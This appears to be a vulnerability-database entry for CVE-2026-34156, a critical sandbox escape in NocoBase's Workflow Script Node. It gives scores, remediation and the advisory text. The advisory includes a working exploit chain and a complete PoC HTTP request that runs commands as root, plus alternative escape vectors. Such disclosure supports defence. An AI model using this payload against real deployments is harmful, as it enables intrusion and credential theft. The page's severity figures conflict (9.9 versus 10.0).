What is the CVSS score of CVE-2026-34156?

CVE-2026-34156 has a CVSS 3.1 base score of 9.9 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H. EPSS exploitation probability: 5.2%.

Which versions of Docker are affected by CVE-2026-34156?

NocoBase Workflow Script Node contains a critical remote code execution vulnerability (CVE-2026-34156, CVSS 10.0) that allows low-privilege authenticated users to escape the Node.js sandbox and…. A patch is available.

Is there a public PoC exploit available for CVE-2026-34156?

Yes, a public proof-of-concept exploit is available for CVE-2026-34156. Prioritise patching immediately. EPSS: 5.2%.

Docker CVE-2026-34156

CRITICAL

Improper Control of Dynamically-Managed Code Resources (CWE-913)

2026-03-30 https://github.com/nocobase/nocobase

GHSA-px3p-vgh9-m57c

RCE Docker Node.js Debian

9.9

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Patch released

Mar 31, 2026 - 21:13 nvd

Patch available

Analysis Generated

Mar 30, 2026 - 17:36 vuln.today

CVE Published

Mar 30, 2026 - 17:16 nvd

CRITICAL 9.9

DescriptionNVD

## Summary

NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js vm sandbox with a custom require allowlist (controlled by WORKFLOW_SCRIPT_MODULES env var). However, the console object passed into the sandbox context exposes host-realm WritableWorkerStdio stream objects via console._stdout and console._stderr.

An authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution (RCE) as root.

Exploit Chain

console._stdout.constructor.constructor → host-realm Function constructor
Function('return process')() → Node.js process object
process.mainModule.require('child_process') → unrestricted module loading
child_process.execSync('id') → RCE as root

This completely bypasses the customRequire allowlist.

Impact

Remote Code Execution as root (uid=0) inside Docker container
Database credential theft (DB_PASSWORD, INIT_ROOT_PASSWORD from process.env)
Arbitrary file read/write via require('fs')
Reverse shell confirmed
Outbound network access for lateral movement

Proof of Concept

HTTP Request:

POST /api/flow_nodes:test Authorization: Bearer <JWT_TOKEN> Content-Type: application/json

{ "type": "script", "config": { "content": "const Fn=console._stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child_process');return cp.execSync('id').toString().trim();", "timeout": 5000, "arguments": [] } }

Response:

{"data":{"status":1,"result":"uid=0(root) gid=0(root) groups=0(root)","log":""}}

Environment

Docker image: nocobase/nocobase:latest
NocoBase CLI: v2.0.26
Node.js: v20.20.1
OS: Debian GNU/Linux 12 (bookworm)

PoC

Got reverse shell

Proof of concept the root privileges

os-release demonstration

App path

Exploit Usage:

Reverse Shell Mode

Dump system information & creds

Remote Command Execution Mode

Remediation

Replace Node.js vm module with isolated-vm for true V8 isolate separation
Do not pass the host console object into the sandbox; create a clean proxy
Run the application as a non-root user inside Docker
Restrict /api/flow_nodes:test to admin-only roles

Alternative Escape Vectors

console._stderr.constructor.constructor (identical chain via stderr)
Error.prepareStackTrace + CallSite.getThis() (V8 CallSite API)

Reporter

Onurcan Genç - Independent Security Researcher, Bilkent University

AnalysisAI

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated low-privilege attackers to escape Node.js vm sandbox and execute arbitrary commands as root inside Docker containers. The vulnerability exploits exposed WritableWorkerStdio stream objects in the sandbox console to traverse the prototype chain, access the host-realm Function constructor, load unrestricted Node.js modules (child_process), and spawn system commands. …

RemediationAI

Within 24 hours: Inventory all NocoBase deployments and identify instances with Workflow Script Node enabled; isolate affected systems from production networks if possible; disable the @nocobase/plugin-workflow-javascript plugin in all instances. Within 7 days: Implement network-level access controls restricting NocoBase to administrative users only; rotate all database credentials exposed in affected containers; audit workflow execution logs for suspicious activity. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory